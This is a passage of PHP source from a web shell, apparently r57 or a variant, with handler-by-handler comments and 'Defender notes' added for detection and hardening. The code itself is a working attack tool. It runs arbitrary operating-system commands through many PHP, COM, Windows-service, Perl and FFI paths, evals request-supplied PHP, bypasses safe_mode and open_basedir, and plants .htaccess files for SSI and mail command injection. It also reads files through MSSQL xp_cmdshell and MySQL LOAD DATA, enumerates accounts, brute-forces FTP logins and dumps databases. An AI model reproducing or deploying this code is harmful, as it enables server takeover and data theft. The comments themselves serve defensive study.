$D = array_unique($D);
// Results are printed only when a "root" request parameter is present.
foreach($D as $item)
if(isset($_REQUEST['root']))
echo "{$item}\n";
// Error handler installed by set_error_handler("eh"). It matches PHP's
// "SAFE MODE Restriction in effect" warning text and stores the second capture
// group (the text between "is not allowed to access" and "owned by uid") in
// the global array $D at index $c, then advances $c. Messages that do not
// match are dropped. It returns nothing, so PHP's standard error handling is
// not invoked for errors passed to it.
function eh($errno, $errstr, $errfile, $errline){
global $D, $c, $i;
preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
if($o){ $D[$c] = $o[2]; $c++;}
}
if($safe_mode)
{
switch($_POST['cmd'])
{
case 'safe_dir':
$d=@dir($dir);
if ($d)
{
while (false!==($file=$d->read()))
{
if ($file=="." || $file=="..") continue;
@clearstatcache();
list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
if(!$unix){
echo date("d.m.Y H:i",$mtime);
if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
}
else{
$owner = @posix_getpwuid($uid);
$grgid = @posix_getgrgid($gid);
echo $inode." ";
echo perms(@fileperms($file));
printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
echo date("d.m.Y H:i ",$mtime);
}
echo "$file\n";
}
$d->close();
}
else echo $lang[$language._text29];
break;
case 'test1':
$ci = @curl_init("file://".$_POST['test1_file']."");
$cf = @curl_exec($ci);
echo $cf;
break;
case 'test2':
@include($_POST['test2_file']);
break;
case 'test4':
if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
$db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
if($db)
{
if(@mssql_select_db($_POST['test4_md'],$db))
{
@mssql_query("drop table r57_temp_table",$db);
@mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
@mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
$res = mssql_query("select * from r57_temp_table",$db);
while(($row=@mssql_fetch_row($res)))
{
echo $row[0]."\r\n";
}
@mssql_query("drop table r57_temp_table",$db);
}
else echo "[-] ERROR! Can't select database";
@mssql_close($db);
}
else echo "[-] ERROR! Can't connect to MSSQL server";
break;
case 'test5':
if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
$extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
@mb_send_mail(NULL, NULL, NULL, NULL, $extra);
$lines = file ('/tmp/mb_send_mail');
foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
break;
case 'test6':
$stream = @imap_open('/etc/passwd', "", "");
$dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
@imap_close($stream);
break;
case 'test7':
$stream = @imap_open($_POST['test7_file'], "", "");
$str = @imap_body($stream, 1);
echo $str;
@imap_close($stream);
break;
case 'test8':
if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118'];
else echo $lang[$language.'_text119'];
break;
case 'cURL':
if(empty($_POST['SnIpEr_SA'])){
} else {
$curl=$_POST['SnIpEr_SA'];
$ch =curl_init("file:///".$curl."\x00/../../../../../../../../../../../../".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
echo "</textarea></CENTER>";
}
break;
case 'copy':
if(empty($snn)){
if(empty($_GET['snn'])){
if(empty($_POST['snn'])){
} else {
$u1p=$_POST['snn'];
}
} else {
$u1p=$_GET['snn'];
}
}
$u1p=""; // File to Include... or use _GET _POST
$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp
$temp=tempnam($tymczas, "cx");
if(copy("compress.zlib://".$snn, $temp)){
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "".htmlspecialchars($tekst)."";
unlink($temp);
echo "</textarea></CENTER>";
}
break;
case 'ini_restore':
if(empty($_POST['ini_restore'])){
} else {
$ini=$_POST['ini_restore'];
echo ini_get("safe_mode");
echo ini_get("open_basedir");
require_once("$ini");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
echo "</textarea></CENTER>";
}
break;
case 'glob':
// Handler 'glob': directory listing through glob(). The prefix is read from $_REQUEST['glob']
// (so it may arrive by GET, POST or cookie, depending on request_order) and "*" is appended.
// The matching names are echoed without HTML escaping.
function reg_glob()
{
$chemin=$_REQUEST['glob'];
$files = glob("$chemin*");
foreach ($files as $filename) {
echo "$filename\n";
}
}
if(isset($_REQUEST['glob']))
{
reg_glob();
}
break;
case 'zend':
// Handler 'zend': includes the path in $_POST['zend'], dumps the whole $GLOBALS array with
// print_r(), then passes the same path to require_once().
// The include executes any PHP in the target file; the $GLOBALS dump exposes every variable in
// scope, which can include configuration values and credentials of the hosting application.
if(empty($_POST['zend'])){
} else {
$dezend=$_POST['zend'];
include($_POST['zend']);
print_r($GLOBALS);
require_once("$dezend");
echo "</textarea></p>";
}
break;
case 'plugin':
// Handler 'plugin': enumerates local accounts without opening /etc/passwd, by asking
// posix_getpwuid() for every uid from 0 to 59999 and printing each returned field followed by ":".
// each() was removed in PHP 8.0, so this loop only runs on older interpreters.
// Defender note: listing posix_getpwuid in disable_functions removes this branch.
if ($_POST['plugin'] ){
for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd
$ara = posix_getpwuid($uid);
if (!empty($ara)) {
while (list ($key, $val) = each($ara)){
print "$val:";
}
print "\n";
}
}
echo "</textarea>";
}
break;
case 'command':
// Handler 'command': runs $_POST['command'] as an operating-system command. $method selects
// which of six PHP functions is used (system, passthru, exec, shell_exec, popen, proc_open);
// where $method is assigned is not visible in this part of the file.
// Defender notes:
//  - all six are ordinary functions and can be listed in disable_functions;
//  - requests with POST fields cmd=command, command=... and method=... match this branch;
//  - child processes of the web-server account (shells, id, ls, ...) are the runtime signal.
if (!empty($_POST['command'])) {
if ($method=="system") {
system($_POST['command']);
echo "Functions system";
}
if ($method=="passthru") {
passthru($_POST['command']);
echo "Functions passthru";
}
if ($method=="exec") {
// exec() returns only the last line of output, so only that line is echoed.
$string = exec($_POST['command']);
echo $string;
echo "Functions exec";
}
if ($method=="shell_exec") {
$string = shell_exec($_POST['command']);
echo $string;
echo "Functions shell_exec";
}
if ($method=="popen") {
$pp = popen($_POST['command'], 'r');
// A single read of at most 2096 bytes; longer output is cut off.
$read = fread($pp, 2096);
echo $read;
pclose($pp);
echo "Functions popen";
}
if ($method=="proc_open") {
// This branch keeps per-session state (history, output, cwd) in $_SESSION. It refers to $ini,
// $rows, $columns and logout(), none of which are defined in the visible part of the file.
// Defender note: the session store will contain the commands issued and their output.
$command = isset($_POST['command']) ? $_POST['command'] : '';
/* Load the configuration. */
/* Default settings --- these settings should always be set to something. */
/* Merge settings. */
session_start();
if (!empty($command)) {
/* Save the command for late use in the JavaScript. If the command is
* already in the history, then the old entry is removed before the
* new entry is put into the list at the front. */
if (($i = array_search($_POST['command'], $_SESSION['history'])) !== false)
unset($_SESSION['history'][$i]);
array_unshift($_SESSION['history'], $_POST['command']);
/* Now append the command to the output. */
$_SESSION['output'] .= '$ ' . $_POST['command'] . "\n";
/* Initialize the current working directory. */
// ereg() was removed in PHP 7.0.
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_POST['command'])) {
$_SESSION['cwd'] = realpath($ini['settings']['home-directory']);
} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_POST['command'], $regs)) {
/* The current command is a 'cd' command which we have to handle
* as an internal shell command. */
// The curly-brace string offset below is rejected at compile time by PHP 8.0 and later,
// so the file as decoded would not load there.
if ($regs[1]{0} == '/') {
/* Absolute path, we use it unchanged. */
$new_dir = $regs[1];
} else {
/* Relative path, we append it to the current working
* directory. */
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
}
/* Transform '/./' into '/' */
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/', $new_dir);
/* Transform '//' into '/' */
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir);
/* Transform 'x/..' into '' */
while (preg_match('|/\.\.(?!\.)|', $new_dir))
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
if ($new_dir == '') $new_dir = '/';
/* Try to change directory. */
if (@chdir($new_dir)) {
$_SESSION['cwd'] = $new_dir;
} else {
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
}
} elseif (trim($_POST['command']) == 'exit') {
logout();
} else {
/* The command is not an internal command, so we execute it after
* changing the directory and save the output. */
chdir($_SESSION['cwd']);
// We cannot use putenv() in safe mode.
if (!ini_get('safe_mode')) {
// Advise programs (ls for example) of the terminal size.
putenv('ROWS=' . $rows);
putenv('COLUMNS=' . $columns);
}
/* Alias expansion. */
// The expanded value is stored in $command, but proc_open() below is given the raw
// $_POST['command'], so the expansion has no effect as written.
$length = strcspn($_POST['command'], " \t");
$token = substr($_POST['command'], 0, $length);
if (isset($ini['aliases'][$token]))
$command = $ini['aliases'][$token] . substr($_POST['command'], $length);
$io = array();
$p = proc_open($_POST['command'],
array(1 => array('pipe', 'w'),
2 => array('pipe', 'w')),
$io);
/* Read output sent to stdout. */
while (!feof($io[1])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
ENT_COMPAT, 'UTF-8');
}
/* Read output sent to stderr. */
while (!feof($io[2])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
ENT_COMPAT, 'UTF-8');
}
fclose($io[1]);
fclose($io[2]);
proc_close($p);
}
}
/* Build the command history for use in the JavaScript */
if (empty($_SESSION['history'])) {
$js_command_hist = '""';
} else {
$escaped = array_map('addslashes', $_SESSION['history']);
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
}
}
}
break;
case 'test10':
// Handler 'test10': file write through error_log(). With message type 3 the message
// ($_POST['test10_content']) is appended to the destination, which is built here as
// "php://../../" followed by $_POST['test10_file'].
// NOTE(review): the php:// prefix presumably exists to get past a path check - confirm.
// Defender note: new or modified .php files under the web root after such a request are the
// artifact to look for; listing error_log in disable_functions removes this branch.
@error_log($_POST['test10_content'], 3,"php://../../".$_POST['test10_file']);
break;
case 'test11':
// Handler 'test11': command execution through the mail transport. A .htaccess file is written
// next to the script that sets php_value mail.force_extra_parameters to a string carrying
// $_POST['test11_cmd'] with its output redirected to result.txt, and mail() is then called.
// $lines is never assigned in this branch (the wait loop is commented out and there is no
// file() call), so the output loop depends on a value left over from elsewhere.
// Defender notes: artifacts are ./.htaccess containing mail.force_extra_parameters and
// ./result.txt in the script's directory. An Apache AllowOverride setting that does not permit
// php_value in .htaccess removes this branch.
if(file_exists("./result.txt") && file_exists("./.htaccess"))
{
@unlink("./.htaccess");
@unlink("./result.txt");
}
if ($handle = @fopen("./.htaccess", 'w')) { @fwrite($handle, "php_value mail.force_extra_parameters '-t && ".$_POST['test11_cmd']." > ".dirname($_SERVER["SCRIPT_FILENAME"])."/result.txt'"); mail("", "", ""); }
//while(!file_exists(dirname($_SERVER["SCRIPT_FILENAME"])."/result.txt")) sleep(1);
if($lines) foreach ($lines as $line) { echo htmlspecialchars($line); }
break;
case 'test12':
// Handler 'test12': command execution through server-side includes. It overwrites ./.htaccess
// so that .shtml files are parsed with "Options +Includes", writes cmdssi.shtml containing an
// SSI exec directive built from $_POST['test12_cmd'], and then includes that file over HTTP
// from the site's own host name.
// Defender notes: artifacts are a .htaccess with "AddHandler server-parsed .shtml" and a file
// named cmdssi.shtml. The branch needs AllowOverride to permit Options, SSI exec to be allowed
// (IncludesNOEXEC blocks it) and allow_url_include to be on.
if ($handle = @fopen("./.htaccess", 'w')) { @fwrite($handle, "AddType text/html .shtml\r\nAddHandler server-parsed .shtml\r\nOptions +Includes"); }
if ($handle = @fopen("./cmdssi.shtml", 'w')) { @fwrite($handle, '<!--#exec cmd="'.$_POST['test12_cmd'].'"-->'); }
// (original comment is unreadable after an encoding loss; it mentions url_fopen)
@include("http://".$_SERVER['HTTP_HOST'].rtrim(dirname($_SERVER['PHP_SELF']),'/\\')."/cmdssi.shtml");
break;
case 'test13':
// Handler 'test13' (Windows): command execution through COM. It picks the first writable
// directory among $_ENV['TMP'], session.save_path, upload_tmp_dir and the script's directory,
// runs cmd.exe /c with $_POST['test13_cmd'] via wscript.shell, redirects output to
// result_test13.txt there, polls once a second until the file exists, prints it, deletes it.
// Defender notes: cmd.exe spawned by the PHP/web-server process and a short-lived
// result_test13.txt in a temp directory are the artifacts. Disabling the COM extension
// (com_dotnet) removes this branch.
$tmp = '';
if(@is_writable($_ENV['TMP'])) $tmp=$_ENV['TMP'];
elseif(@is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path');
elseif(@is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir');
elseif(@is_writeable(dirname(__FILE__))) $tmp=dirname(__FILE__);
else break;
@unlink($tmp.'/result_test13.txt');
$wscript = new COM('wscript.shell');
$wscript->Run('cmd.exe /c "'.$_POST['test13_cmd'].'" > '.$tmp.'/result_test13.txt');
// Unbounded wait: if the output file never appears, the request hangs until PHP's time limit.
while(!file_exists($tmp.'/result_test13.txt')) sleep(1);
$lines = @file ($tmp.'/result_test13.txt');
if($lines) foreach ($lines as $line) { echo htmlspecialchars($line); }
@unlink($tmp.'/result_test13.txt');
break;
case 'test14':
// Handler 'test14': file read through the ionCube loader's ioncube_read_file(), with the path
// taken from $_POST['test14_cmd']. The result is printed HTML-escaped.
$ioncube = @ioncube_read_file($_POST['test14_cmd']);
echo htmlspecialchars($ioncube);
break;
case 'test15':
// Handler 'test15' (Windows): command execution through win_shell_execute(). The temp directory
// is chosen as in the other Windows branches; cmd.exe /c runs $_POST['test15_cmd'] with output
// redirected to result_test15.txt, which is polled for, printed HTML-escaped and deleted.
// Defender note: the win32std extension is required (the form for this branch is only shown
// when it is loaded); cmd.exe as a child of the PHP process is the runtime signal.
$tmp = '';
if(@is_writable($_ENV['TMP'])) $tmp=$_ENV['TMP'];
elseif(@is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path');
elseif(@is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir');
elseif(@is_writeable(dirname(__FILE__))) $tmp=dirname(__FILE__);
else break;
@unlink($tmp.'/result_test15.txt');
@win_shell_execute("cmd.exe","","/c ".$_POST['test15_cmd']." > ".$tmp."/result_test15.txt");
// Unbounded wait: if the output file never appears, the request hangs until PHP's time limit.
while(!file_exists($tmp.'/result_test15.txt')) sleep(1);
$lines = @file ($tmp.'/result_test15.txt');
if($lines) foreach ($lines as $line) { echo htmlspecialchars($line); }
@unlink($tmp.'/result_test15.txt');
break;
case 'test16':
// Handler 'test16' (Windows): command execution by registering a temporary Windows service.
// A service with a uniqid() name is created whose binary is cmd.exe (from COMSPEC, or a
// hard-coded path) with parameters "/c <POST test16_cmd> > <temp file>", then started, stopped
// and deleted. The temp file is polled for, printed HTML-escaped and removed.
// Defender notes: service-creation and service-deletion events for a randomly named service
// whose image path is cmd.exe are the strongest artifact. The win32service extension is required.
$tmp = '';
if(@is_writable($_ENV['TMP'])) $tmp=$_ENV['TMP'];
elseif(@is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path');
// The next test is a fresh "if", not "elseif": when neither upload_tmp_dir nor the script
// directory is writable, the branch exits even if a directory was found above.
if(@is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir');
elseif(@is_writeable(dirname(__FILE__))) $tmp=dirname(__FILE__);
else break;
$name=$tmp."\\".uniqid();
$n=uniqid();
$cmd=(empty($_SERVER['COMSPEC']))?'c:\\windows\\system32\\cmd.exe':$_SERVER['COMSPEC'];
win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c ".$_POST['test16_cmd']." >\"$name\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
// Unbounded wait: if the output file never appears, the request hangs until PHP's time limit.
while(!file_exists($name)) sleep(1);
$exec=file_get_contents($name);
unlink($name);
echo htmlspecialchars($exec);
break;
case 'test17':
// Handler 'test17': command execution through the Perl extension. Backslashes in
// $_POST['test17_cmd'] are doubled, and the value is placed between backticks in a Perl
// print statement that is evaluated by the embedded interpreter.
// Defender note: the perl extension is required (the form for this branch is only shown when
// it is loaded); unloading it removes this branch.
$_POST['test17_cmd'] = str_replace('\\','\\\\',$_POST['test17_cmd']);
$perl = new Perl();
$perl->eval('print `'.$_POST['test17_cmd'].'`');
break;
case 'test18':
// Handler 'test18' (Windows): command execution through the ffi extension. WinExec from
// kernel32.dll is declared and called with "cmd.exe /c <POST test18_cmd>" and output
// redirected to a uniqid()-named file, which is polled for, printed HTML-escaped and deleted.
// $tmp is not initialised in this branch, and the directory selection has the same
// if/elseif break as the service-based branch above it in the original file.
// Defender note: cmd.exe as a child of the PHP process and short-lived, randomly named files
// in the temp, session or upload directories are the artifacts.
if(@is_writable($_ENV['TMP'])) $tmp=$_ENV['TMP'];
elseif(@is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path');
if(@is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir');
elseif(@is_writeable(dirname(__FILE__))) $tmp=dirname(__FILE__);
else break;
$name=$tmp."\\".uniqid();
$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res=$api->WinExec("cmd.exe /c ".$_POST['test18_cmd']." >\"$name\"",0);
// Unbounded wait: if the output file never appears, the request hangs until PHP's time limit.
while(!file_exists($name)) sleep(1);
$exec=file_get_contents($name);
unlink($name);
echo htmlspecialchars($exec);
break;
}
}
else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
$cmd_rep = ex($_POST['cmd']);
if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
else { echo @htmlspecialchars($cmd_rep)."\n"; }}
// Handler cmd=UnKn0wN_mysql: reads a file from the web server's file system through a MySQL
// client connection. It connects with request-supplied host, port, login and password
// (defaults localhost:3306), creates a scratch table named UnKn0wN, loads
// $_POST['test3_file'] into it with LOAD DATA LOCAL INFILE, prints the rows HTML-escaped
// and drops the table again.
// Defender notes:
//  - the table name UnKn0wN and the CREATE / LOAD DATA LOCAL / DROP sequence are visible in
//    the MySQL general or audit log when one is enabled;
//  - turning off local_infile on the server (and the client-side allow_local_infile setting)
//    removes this branch;
//  - the mysql_* functions used here were removed in PHP 7.0.
if ($_POST['cmd']=="UnKn0wN_mysql")
{
if(empty($_POST['test3_sr'])) { $_POST['test3_sr'] = "localhost"; }
if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
$db = @mysql_connect($_POST['test3_sr'].':'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
if($db)
{
if(@mysql_select_db($_POST['test3_md'],$db))
{
@mysql_query("DROP TABLE IF EXISTS UnKn0wN");
@mysql_query("CREATE TABLE `UnKn0wN` ( `file` LONGBLOB NOT NULL )");
// The file path is concatenated into the statement after backslashes are turned into slashes.
@mysql_query("LOAD DATA LOCAL INFILE \"".str_replace('\\','/',$_POST['test3_file'])."\" INTO TABLE UnKn0wN FIELDS TERMINATED BY '' ESCAPED BY '' LINES TERMINATED BY '\n'");
$r = @mysql_query("SELECT * FROM UnKn0wN");
while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
@mysql_query("DROP TABLE IF EXISTS UnKn0wN");
}
else echo "[-] ERROR! Can't select database";
@mysql_close($db);
}
else echo "[-] ERROR! Can't connect to mysql server";
}
// Handler cmd=ftp_brute: password guessing against an FTP server. For every name in $users it
// opens a connection to $ftp_server:$ftp_port (10 s timeout) and tries the user name as its
// own password; when the POST field "reverse" is set it also tries the reversed name.
// $users, $ftp_server and $ftp_port are assigned outside the visible part of the file.
// Defender notes: the FTP log shows a burst of logins from the web host in which the password
// equals the user name (or its reverse), one connection per account. Account lockout or rate
// limiting on the FTP service and egress filtering from the web server both blunt this.
if ($_POST['cmd']=="ftp_brute")
{
$suc = 0;
foreach($users as $user)
{
$connection = @ftp_connect($ftp_server,$ftp_port,10);
if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
@ftp_close($connection);
}
echo "\r\n-------------------------------------\r\n";
// Reported attempt count: one per user, doubled when the reversed variant is enabled.
$count = count($users);
if(isset($_POST['reverse'])) { $count *= 2; }
echo $lang[$language.'_text97'].$count."\r\n";
echo $lang[$language.'_text98'].$suc."\r\n";
}
// Handler cmd=php_eval: executes request-supplied PHP. The short open tag and the close tag
// are stripped from $_POST['php_eval'] and the remainder is passed to eval().
// Defender notes: eval is a language construct, so disable_functions cannot switch it off;
// detection has to rely on request inspection (POST fields cmd=php_eval / php_eval=...) and on
// finding the file itself.
if ($_POST['cmd']=="php_eval"){
$eval = @str_replace("<?","",$_POST['php_eval']);
$eval = @str_replace("?>","",$eval);
eval($eval);}
// Handler cmd=mysql_dump: dumps a database table using the my_sql class (defined outside the
// visible part of the file). All connection details and the table name come from the request.
// When the POST field "dif" is set, the dump is written to the path in $_POST['dif_name'];
// otherwise it is echoed into the page.
// Defender notes: this is the data-exfiltration path of the tool. Look for large responses to
// POSTs with cmd=mysql_dump and for dump files written under attacker-chosen paths. The file
// handle opened here is not closed in the visible code.
if ($_POST['cmd']=="mysql_dump")
{
if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
$sql = new my_sql();
$sql->db = $_POST['db'];
$sql->host = $_POST['db_server'];
$sql->port = $_POST['db_port'];
$sql->user = $_POST['mysql_l'];
$sql->pass = $_POST['mysql_p'];
$sql->base = $_POST['mysql_db'];
if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
else {
if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
else { echo "[-] ERROR! Can't write in dump file"; }
}
}
echo "</textarea></div>";
echo "</b>";
echo "</td></tr></table>";
echo "<table width=100% cellpadding=0 cellspacing=0>";
/**
 * Build the clickable heading of one collapsible panel.
 *
 * The returned anchor calls the script function change_divst() with the panel id when
 * clicked. Neither argument is escaped; both are placed into the markup as given.
 *
 * @param string $title Text or markup shown as the heading.
 * @param string $id    Panel id handed to change_divst().
 * @return string Anchor element markup.
 */
function div_title($title, $id)
{
    $onClick = 'change_divst(\'' . $id . '\');';

    return '<a style="cursor: pointer;" onClick="' . $onClick . '">' . $title . '</a>';
}
/**
 * Open the container element of one collapsible panel.
 *
 * The panel starts hidden when a cookie named after the panel id exists and compares
 * loosely equal to 0; otherwise it starts visible. The id is not escaped.
 *
 * @param string $id Panel id, also used as the cookie name.
 * @return string Opening div tag.
 */
function div($id)
{
    $collapsed = isset($_COOKIE[$id]) && $_COOKIE[$id] == 0;
    $style = $collapsed ? ' style="display: none;"' : '';

    return '<div id="' . $id . '"' . $style . '>';
}
// Renders the command-entry panels. Without safe_mode a single form posts "cmd" and "dir".
// With safe_mode the page instead offers a directory form (cmd=safe_dir), a form that posts
// "command" together with a "method" selector (cmd=command), and two forms whose default
// target is /etc/passwd (cmd=ini_restore and cmd=plugin).
// sr(), in() and ws() are helpers defined outside the visible part of the file.
// Defender note: the hidden "cmd" values and field names emitted here (safe_dir, command,
// method, ini_restore, plugin) are the parameters to look for in request logs or WAF captures.
if(!$safe_mode){
echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
echo $te.'</div>'.$table_end1.$fe;
}
else{
echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
echo $te.'</div>'.$table_end1.$fe;
echo $fs.$table_up1.div_title($lang[$language.'_text208'],'id15').$table_up2.div('id15').$ts;
// The option list below sits inside one double-quoted string: the short-tag snippets are sent
// to the browser as literal text (with $method interpolated), they are not executed, so no
// option is ever marked as selected.
echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select name=\"method\">
<option value=\"system\" <? if ($method==\"system\") { echo \"selected\"; } ?>system</option>
<option value=\"passthru\" <? if ($method==\"passthru\") { echo \"selected\"; } ?>passthru</option>
<option value=\"exec\" <? if ($method==\"exec\") { echo \"selected\"; } ?>exec</option>
<option value=\"shell_exec\" <? if ($method==\"shell_exec\") { echo \"selected\"; } ?>shell_exec</option>
<option value=\"popen\" <? if ($method==\"popen\") { echo \"selected\"; } ?>popen</option>
<option value=\"proc_open\" <? if ($method==\"proc_open\") { echo \"selected\"; } ?>proc_open</option>
</select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text3'].$arrow."</b>".in('text','command',54,(!empty($_POST['command'])?($_POST['command']):("id"))).in('hidden','cmd',0,'command').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
echo $te.'</div>'.$table_end1.$fe;
echo $fs.$table_up1.div_title($lang[$language.'_text203'],'id411').$table_up2.div('id411').$ts;
echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','ini_restore',85,'/etc/passwd').in('hidden','cmd',0,'ini_restore').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
echo $te.'</div>'.$table_end1.$fe;
echo $fs.$table_up1.div_title($lang[$language.'_text224'],'id511').$table_up2.div('id511').$ts;
echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>","<select size=\"1\" name=\"plugin\"><option value=\"plugin\">/etc/passwd</option></option></select>".in('hidden','cmd',0,'plugin').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
echo $te.'</div>'.$table_end1.$fe;
}
echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
echo $te.'</div>'.$table_end1.$fe;
// Renders one form per restriction-bypass handler (cmd=test10 ... cmd=test18). Each form is
// shown only when $safe_mode is set, and several only when a specific extension is loaded or
// the host is not Unix. The extension_loaded() checks therefore double as an inventory of the
// optional extensions this tool can abuse: ionCube Loader, win32std, win32service, perl, ffi.
// Previously posted values are put back into the inputs through in(); whether in() escapes
// them is not visible here.
// Defender note: a hardening review can use the same list. Any of these extensions that the
// application does not need should not be loaded.
if($safe_mode)
{
echo $fs.$table_up1.div_title($lang[$language.'_text204'],'id204').$table_up2.div('id204').$ts;
echo sr(15,"<b>".$lang[$language.'_text226'].$arrow."</b>",in('text','test10_file',96,(!empty($_POST['test10_file'])?($_POST['test10_file']):('../../file.php'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test10'));
echo sr(15,"<b>".$lang[$language.'_text227'].$arrow."</b>",in('text','test10_content',96,(!empty($_POST['test10_content'])?($_POST['test10_content']):('<? echo \'gotcha\'; ?>'))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode)
{
echo $fs.$table_up1.div_title($lang[$language.'_text225'],'id225').$table_up2.div('id225').$ts;
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test11_cmd',96,(!empty($_POST['test11_cmd'])?($_POST['test11_cmd']):('ls -la'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test11').in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode)
{
echo $fs.$table_up1.div_title($lang[$language.'_text228'],'id228').$table_up2.div('id228').$ts;
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test12_cmd',96,(!empty($_POST['test12_cmd'])?($_POST['test12_cmd']):('ls -la'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test12').in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&!$unix)
{
echo $fs.$table_up1.div_title($lang[$language.'_text229'],'id229').$table_up2.div('id229').$ts;
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test13_cmd',96,(!empty($_POST['test13_cmd'])?($_POST['test13_cmd']):('dir'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test13').in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&extension_loaded("ionCube Loader"))
{
echo $fs.$table_up1.div_title($lang[$language.'_text230'],'id230').$table_up2.div('id230').$ts;
